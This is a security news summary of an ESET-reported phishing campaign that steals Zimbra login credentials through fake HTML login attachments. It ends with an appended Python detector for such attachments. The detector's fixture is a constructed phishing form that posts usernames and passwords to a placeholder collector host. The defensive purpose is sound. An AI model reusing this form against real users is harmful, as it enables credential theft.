A phishing campaign designed to collect Zimbra user credentials was uncovered by ESET. Zimbra Collaboration is an open-core collaborative software platform. The campaign has been active since at least April 2023 and is still ongoing.

The campaign targets a variety of small and medium businesses and governmental entities. According to researchers, the largest number of targets are located in Poland; however, victims in other European countries such as Ukraine, Italy, France and the Netherlands are also targeted. Latin American nations were hit too; Ecuador tops the list of detections in that region.

Initially, the target receives an email with a phishing page in the attached HTML file. The email warns the target about an email server update, account deactivation or similar issue and directs the user to click on the attached file. After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization.

In the background, the submitted credentials are collected from the HTML form and sent to a server controlled by the adversary. Then, the attacker is potentially able to infiltrate the affected email account. It is likely that the attackers were able to compromise the victim’s administrator accounts and create new mailboxes that were then used to send phishing emails to other targets.
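A defender-side check for the delivery method described above, as an added example that is not from ESET or the original page: it scans an HTML attachment for a password form whose action points to a remote host. The function names, the `trusted_hosts` parameter and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class _FormScanner(HTMLParser):
    """Collects each <form> with its action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": (a.get("action") or "").strip(), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(html, trusted_hosts=()):
    """Return remote hosts that password forms in an HTML attachment submit to."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    hits = []
    for form in scanner.forms:
        url = urlparse(form["action"])
        host = (url.hostname or "").lower()
        # An attachment is opened from disk, so any http(s) action leaves the machine.
        if form["password"] and url.scheme in ("http", "https") and host not in trusted_hosts:
            hits.append(host)
    return hits

# Constructed sample attachment; collector.example.invalid is a placeholder host.
SAMPLE = """<html><body><h1>Zimbra Web Client Sign In</h1>
<form method="post" action="https://collector.example.invalid/login.php">
<input type="text" name="username"><input type="password" name="password">
<input type="submit" value="Sign In"></form></body></html>"""

# Constructed benign form: remote action but no password field.
BENIGN = '<form action="https://example.invalid/search"><input type="text" name="q"></form>'

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE))
```

A form that submits through script rather than an `action` attribute is not caught by this check, so it complements rather than replaces attachment-type filtering at the mail gateway.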